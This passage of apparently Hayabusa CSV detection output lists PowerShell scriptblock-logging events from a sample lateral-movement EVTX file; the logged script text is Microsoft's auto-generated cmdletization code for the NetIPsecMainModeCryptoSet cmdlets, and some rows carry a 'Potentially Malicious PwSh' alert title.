$__cmdletization_methodParam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eters = 
[System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' -Alias '*' function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true 
throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } 
if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetNam",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value 
= ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' -Alias '*' function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] 
[string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if 
($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) 
$__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetNam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"e )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach 
($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"e )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { 